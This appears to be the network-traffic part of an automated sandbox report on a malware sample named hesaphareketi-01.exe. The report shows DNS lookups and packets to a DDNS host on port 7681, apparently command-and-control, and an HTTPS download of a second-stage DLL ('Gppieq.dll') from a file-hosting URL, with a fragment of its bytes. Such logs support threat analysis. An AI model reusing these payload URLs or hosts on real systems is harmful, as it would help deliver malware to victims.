                                                                  Oct 14, 2021 12:20:58.444552898 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444559097 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444593906 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444721937 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444727898 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444742918 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444763899 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444796085 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444802999 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444818020 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444823027 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444844961 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444892883 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.444900036 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.444932938 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.445894003 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.446314096 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.727092981 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.727197886 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.727210999 CEST4434976231.14.69.10192.168.2.5
                                                                  Oct 14, 2021 12:20:58.727277994 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:20:58.729770899 CEST49762443192.168.2.531.14.69.10
                                                                  Oct 14, 2021 12:21:41.245676041 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:41.417752028 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:41.418170929 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:41.587685108 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:41.636924028 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.032773972 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.224417925 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.228641987 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.414320946 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414371014 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414387941 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414448977 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414478064 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414495945 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414516926 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414531946 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414551020 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414568901 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.414589882 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.414663076 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582206011 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582236052 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582315922 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582318068 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582359076 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582401037 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582422972 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582441092 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582472086 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582473993 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582510948 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582562923 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582566977 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582638025 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582691908 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582757950 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582786083 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582808018 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582830906 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582838058 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582854986 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582885027 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582926035 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582948923 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.582973957 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.582987070 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.583039045 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:42.583058119 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:42.583081007 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.259953976 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.259994030 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260015011 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260050058 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.260113001 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260132074 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260173082 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.260291100 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260344028 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.260348082 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260368109 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.260411024 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.260411024 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.303833961 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.303901911 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.420181990 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420212984 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420226097 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420248032 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420260906 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420275927 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420288086 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420305014 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420320988 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420336962 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420372963 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420413971 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.420458078 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420514107 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.420531034 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.420639038 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.426693916 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.426775932 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.426873922 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.426898956 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.426980972 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427062988 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427098989 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427138090 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427155018 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427171946 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427190065 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427206993 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427226067 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427258968 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427292109 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427300930 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427341938 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427365065 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427381992 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427400112 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427409887 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427417040 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427489042 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427505016 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427536964 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427565098 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427625895 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427644014 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427681923 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427705050 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427771091 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427789927 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427866936 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427885056 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427920103 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.427939892 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.427980900 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428010941 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.428050041 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428066015 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428097963 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428107977 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.428189039 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428190947 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.428220987 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428267002 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.428292036 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428337097 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428363085 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428399086 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.428463936 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428498030 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.428522110 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.470144033 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.470643997 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.470688105 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.470721006 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.470799923 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.470822096 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.470918894 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.588593006 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588803053 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588821888 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588840961 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588860035 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588862896 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.588922024 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.588953018 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.588973045 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589003086 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589025974 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589045048 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589073896 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589114904 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589133024 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589153051 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589158058 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589193106 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589198112 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589220047 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589262962 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589288950 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589309931 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589329004 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589350939 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589359045 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589410067 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589462996 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589482069 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589500904 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589525938 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589569092 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589610100 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589622021 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589653969 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.589690924 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.589696884 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.601941109 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602011919 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.602015972 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602247000 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602292061 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.602442026 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602642059 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602679968 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602685928 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.602925062 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.602969885 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.602999926 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603029966 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603072882 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.603163004 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603318930 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603362083 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.603480101 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603579998 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603622913 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.603637934 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603760004 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.603802919 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.603883028 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604012012 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604055882 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604147911 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604199886 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604248047 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604255915 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604368925 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604402065 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604418993 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604480028 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604521036 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604564905 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604614973 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604645967 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604671955 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604702950 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604753971 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.604835987 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604922056 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.604974031 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605001926 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605123043 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605173111 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605179071 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605197906 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605243921 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605279922 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605314970 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605355978 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605446100 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605561972 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605580091 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605597019 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605611086 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605631113 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605659008 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605680943 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605709076 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605727911 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605746984 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605767012 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605787039 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605798960 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605833054 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605843067 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605871916 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605902910 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.605926991 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.605972052 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.606004953 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.606026888 CEST497847681192.168.2.5185.66.91.154
                                                                  Oct 14, 2021 12:21:43.606071949 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.606090069 CEST768149784185.66.91.154192.168.2.5
                                                                  Oct 14, 2021 12:21:43.606132984 CEST497847681192.168.2.5185.66.91.154

                                                                  UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2021 12:20:57.549612999 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Oct 14, 2021 12:20:57.565828085 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Oct 14, 2021 12:21:41.223095894 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Oct 14, 2021 12:21:41.240967989 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5

                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 14, 2021 12:20:57.549612999 CEST | 192.168.2.5 | 8.8.8.8 | 0x6bce | Standard query (0) | store2.gofile.io | A (IP address) | IN (0x0001)
Oct 14, 2021 12:21:41.223095894 CEST | 192.168.2.5 | 8.8.8.8 | 0xb075 | Standard query (0) | atifgabuying.ddns.net | A (IP address) | IN (0x0001)

                                                                  DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 14, 2021 12:20:57.565828085 CEST | 8.8.8.8 | 192.168.2.5 | 0x6bce | No error (0) | store2.gofile.io | | 31.14.69.10 | A (IP address) | IN (0x0001)
Oct 14, 2021 12:21:41.240967989 CEST | 8.8.8.8 | 192.168.2.5 | 0xb075 | No error (0) | atifgabuying.ddns.net | | 185.66.91.154 | A (IP address) | IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • store2.gofile.io

                                                                  HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49762 | 31.14.69.10 | 443 | C:\Users\user\Desktop\hesaphareketi-01.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-14 10:20:58 UTC | 0 | OUT | GET /download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll HTTP/1.1
Host: store2.gofile.io
Connection: Keep-Alive
2021-10-14 10:20:58 UTC | 0 | IN | HTTP/1.1 200 OK
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Content-Disposition: attachment; filename="Gppieq.dll"
Content-Length: 710656
Content-Type: application/octet-stream
Date: Thu, 14 Oct 2021 10:20:58 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: Express
X-Xss-Protection: 1; mode=block
Connection: close
                                                                  Data Ascii: !#0/'uF[h(0vC2.r ]QlrK6u~eK3KVrJVEEjieEd$%|>t*AV7-{3`hvf02&1^^Ck9F=)\}khSxBk^H!|Z0<KW53C,e~D4 D4
                                                                  2021-10-14 10:20:58 UTC112INData Raw: bb 6c d9 80 f9 ed d4 77 6c ac 9a 64 10 ff 18 67 d5 37 4a ac 67 bb e7 b0 c6 02 f5 75 13 00 f7 e6 c4 36 b7 ba db 50 29 bd 69 27 fc 8b 25 75 9a 4f d2 4b 8a 40 20 44 74 54 df ef 3c 1c 82 4f 1f a6 e3 c1 68 41 d9 84 0e 2d 27 80 93 83 50 f5 2f 88 87 40 0c fd 8b a7 80 5c 79 34 7a 15 7a d6 92 26 6b 86 1d a6 0b e1 14 eb 62 9c 27 65 ba e1 8f 14 77 02 53 35 1b 03 10 04 e6 c8 2b b2 04 ba 59 4e df c6 44 09 be 9c 3f 14 6f 2c ad 2d 65 09 b1 a9 9d ab e3 1c 88 88 68 c1 fa 8a 10 80 2c 06 4a 4f 9a d8 bd dc 0d f8 96 e4 f0 84 ac 85 ae 40 c2 ba a5 70 31 6a ab be b3 76 79 4e 6d 13 ac 51 45 77 96 83 00 20 21 ab 5c 01 38 8d 0d 62 cb d6 d3 9c 0d bf 49 27 4b 26 10 13 58 7e bd 5f 7e 44 61 22 33 87 30 be c9 8c cf 8a 7e 3b 83 5b 65 41 a0 af da 93 5d 39 83 3b f1 a7 e9 81 04 da 56 91 57
                                                                  Data Ascii: lwldg7Jgu6P)i'%uOK@ DtT<OhA-'P/@\y4zz&kb'ewS5+YND?o,-eh,JO@p1jvyNmQEw !\8bI'K&X~_~Da"30~;[eA]9;VW
